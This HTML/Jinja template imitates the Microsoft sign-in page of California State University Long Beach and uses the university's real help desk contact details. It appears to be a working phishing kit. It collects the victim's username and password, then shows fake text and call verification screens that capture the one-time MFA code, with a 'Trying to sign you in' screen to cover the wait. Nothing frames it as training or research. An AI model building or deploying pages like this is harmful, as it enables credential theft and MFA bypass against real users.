<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/static/style.css">
    <script defer src="/static/app.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-1.7.1.min.js"></script>
    <link rel="shortcut icon" type="image/x-icon" href="images/favicon.ico">
    <title>Sign in to your account</title>
</head>
<body>

    <form action = "/login" method = "POST" enctype = "multipart/form-data" id="login-form">
    <div class="login-background-img"></div>
    <div class="sign-in-form">
        <div id='email-sign-in-form' class ='email-sign-in-form'>
            <div id='email-screen'class="email-screen">
                <div class="sign-in-header">
                    <img src="{{url_for('static', filename='images/bannerlogo.png')}}" height = '45px'/>
                </div>
                <div class="sign-in-body">
                    <form class="get-user">
                        <h1 id="form-title">Sign in</h1> 
                        <input type="text" id="username" name="username" placeholder="Email, phone, or Skype">
                        <div class="sign-in-next-btn">
                            <button id='sign-in-next-btn-submit' class="sign-in-next-btn-submit">
                                Next
                            </button>
                        </div>
                    </form>
                </div>
            </div>
            <div class="sign-in-help">
                For questions or assistance, please contact the <a href="#" class="link">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.
            </div>
            <div class="sign-in-options">
                <img id="sign-in-key" src="{{ url_for('static', filename='images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg') }}" alt="sign in">
                <p id="options-text">Sign-in options</p>
            </div>
        </div>
        
        <div id='loading-screen-div' class="loading-screen-div" style="
            display: none;
            background-color: white;
            padding: 50px;
            width: 340px;">
            <div id= 'loading-screen' class="loading-screen">
                <div class="sign-in-header">
                    <img src="{{url_for('static', filename='images/microsoftLogo.svg')}}" />
                </div>
                <div class="sign-in-body">
                        <h1 id="form-title">Trying to sign you in</h1> 
                        <img id="marchingAnts" src="{{ url_for('static', filename='images/marching_ants_white_166de53471265253ab3a456defe6da23.gif') }}" alt="ant">
                </div>
    
            </div>
            
        </div>

        <div id='password-sign-in-form' class="password-sign-in-form">
            <div id= 'password-screen' class="password-screen">
                <div class="sign-in-header">
                    <img src="{{url_for('static', filename='images/bannerlogo.png')}}" height = '45px' />
                </div>
                <div class="sign-in-body">
                    <div class="get-password">
                        <div class="arrow-user">
                            <img id="arrow" src="{{ url_for('static', filename='images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg') }}" alt="back arrow">
                            <div id="display-name"></div>
                        </div>
                        <h1  id="form-title">Enter password</h1> 
                        <input id="password" name="password" placeholder="Password" type="password">
                        <button id='sign-in-btn-submit' class="sign-in-btn-submit" type="submit">
                            Sign in
                        </button>
                    </div>
                </div>
            </div>
            <div id='help' class="sign-in-help">
                For questions or assistance, please contact the <a href="#" class="link">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.
            </div>
        </div>
    </form>
           

            <div id='verification-form' class ='verification-form'>
                <div id='verification-screen'class="verification-screen">
                    <div class="sign-in-header-verify">
                    <img src="{{url_for('static', filename='images/bannerlogo.png')}}" height = '45px' />
                </div>
                <div id="display-name"></div>
                <div class="sign-in-body-verify">
                    <h1 id="form-title-verify">Verify your identity</h1> 
                    <div class="methods">
                        <div class="text-method" onclick="requestCode()"> 
                            <img id="message" src="{{ url_for('static', filename='images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg') }}" alt="message">
                            <h6> Text +X XXXXXXXXXX</h6>
                        </div>
                        <div class="call-method" onclick="call()"> 
                            <img id="phone" src="{{ url_for('static', filename='images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg') }}" alt="phone">
                            <h6> Call +X XXXXXXXXXX</h6>
                        </div>
                        <div id="more-info">
                            <a href="https://support.microsoft.com/en-us/account-billing/common-problems-with-two-step-verification-for-a-work-or-school-account-63acbb9b-16a1-47b9-8619-6a865e8071a5"> More information</a>
                        </div>
                        <div id="more-info">
                            <p>Are your verification methods current? Check at https://aka.ms/mfasetup</p>
                        </div>
                        <!-- <div id="btn-cancel-div">
                            <button id="potatoepotatobtn-cancel">Cancel</button>
                        </div>                     -->
                        
                        </div>
                    </div>
                </div>
                <div class="sign-in-help" id="sign-in-help" name="sign-in-help">
                    For questions or assistance, please contact the <a href="#" class="link">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.
                </div>
            </div>

            

        <div id='text-verify' class="text-verify" style="display: none; background-color: white; padding: 50px ;width: 340px; height: 470px;">
            <div id= 'text-screen' class="text-screen">
                <div class="sign-in-header">
                    <img id="csulbLogo" src="{{url_for('static', filename='images/bannerlogo.png')}}"  alt="califonia state university long beach">
                </div>
                <div class="sign-in-body">
                    <div class="arrow-user">
                        <div id="display-name"></div>
                    </div>
                    <form action = "/text" method = "POST" enctype = "multipart/form-data" id="text-form">
                        <h1  id="form-title">Enter Code</h1> 
                        <div class="code-message">
                            <img id="messageMini" src="{{ url_for('static', filename='images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg') }}" style="float:left" alt="message">
                            <h6> We texted your phone +X XXXXXXXXXX. Please enter the code to sign in.</h6>
                        </div>
                        <input id="code" name="code" placeholder="Code" type="text">
                        <div id="more-info-verify">
                            <p>Having trouble? <a href="#" Sign in>Sign in another way</a></p>
                        </div>
                        <div id="more-info-verify">
                            <a href="https://support.microsoft.com/en-us/account-billing/common-problems-with-two-step-verification-for-a-work-or-school-account-63acbb9b-16a1-47b9-8619-6a865e8071a5"> More information</a>
                        </div>
                        <button type="submit" id='sign-in-btn-submit' class="sign-in-btn-submit" onclick="hide()">
                            Verify
                        </button>
                    </form>
                </div>
    
            </div>
            <div class="sign-in-help" id="sign-in-help" style="margin-left:-50px; margin-top:75px;">
                For questions or assistance, please contact the <a href="#" class="link">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.
            </div>
        </div>
        <div id='call-verify' class="call-verify" style="display: none;background-color: white;padding: 50px;width: 340px; height: 470px;">
            <div id= 'call-screen' class="call-screen">
                <div class="sign-in-header">
                    <img id="csulbLogo" src="{{url_for('static', filename='images/bannerlogo.png')}}"  alt="califonia state university long beach">
                </div>
                <div class="sign-in-body">
                    <div class="arrow-user">
                        <div id="display-name"></div>
                    </div>
                    <!-- <form class="get-code"> -->
                        <h1  id="form-title">Approve sign in request</h1> 
                        <div class="code-message">
                            <img id="messageMini" src="{{ url_for('static', filename='images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg') }}" alt="call">
                            <h6> We're calling your phone. Please answer it to continue</h6>
                        </div>
                        <div id="more-info-verify">
                            <p>Having trouble? <a href="#" Sign in>Sign in another way</a></p>
                        </div>
                        <div id="more-info-verify">
                            <a href="https://support.microsoft.com/en-us/account-billing/common-problems-with-two-step-verification-for-a-work-or-school-account-63acbb9b-16a1-47b9-8619-6a865e8071a5"> More information</a>
                        </div>
                    <!-- </form> -->
                </div>
                <div id='auth-screen-form' class ='auth-screen-form'>
                    <div id='auth-screen'class="auth-screen" style="display: none;">
                        <div class="sign-in-header-verify">
                        <img src="{{url_for('static', filename='images/bannerlogo.png')}}" height = '45px' />
                    </div>
                    <div id="display-name"></div>
                    <div class="sign-in-body-verify">
                        <h1 id="form-title-verify">Verify your identity</h1> 
                        <div class="methods">
                            <div class="text-method" onclick="requestCode()"> 
                                <img id="message" src="{{ url_for('static', filename='images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg') }}" alt="message">
                                <h6> Text +X XXXXXXXXXX</h6>
                            </div>
                            <div class="call-method" onclick="call()"> 
                                <img id="phone" src="{{ url_for('static', filename='images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg') }}" alt="phone">
                                <h6> Call +X XXXXXXXXXX</h6>
                            </div>
                            <div id="more-info">
                                <a href="https://support.microsoft.com/en-us/account-billing/common-problems-with-two-step-verification-for-a-work-or-school-account-63acbb9b-16a1-47b9-8619-6a865e8071a5"> More information</a>
                            </div>
                            <div id="more-info">
                                <p>Are your verification methods current? Check at https://aka.ms/mfasetup</p>
                            </div>
                            <!-- <div id="btn-cancel-div">
                                <button id="potatoepotatobtn-cancel">Cancel</button>
                            </div>                     -->
                            
                            </div>
                        </div>
                    </div>
                    <div class="sign-in-help" id="sign-in-help" name="sign-in-help">
                        For questions or assistance, please contact the <a href="#" class="link">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.
                    </div>
                </div>
            </div>
            <div class="sign-in-help" style="margin-left:-50px; margin-top:75px;">
                For questions or assistance, please contact the <a href="#" class="link">Technology Help Desk</a> at 562-985-4959 or helpdesk@csulb.edu.
            </div>
        </div>
    </div>
</body>
</html>
{{check}}

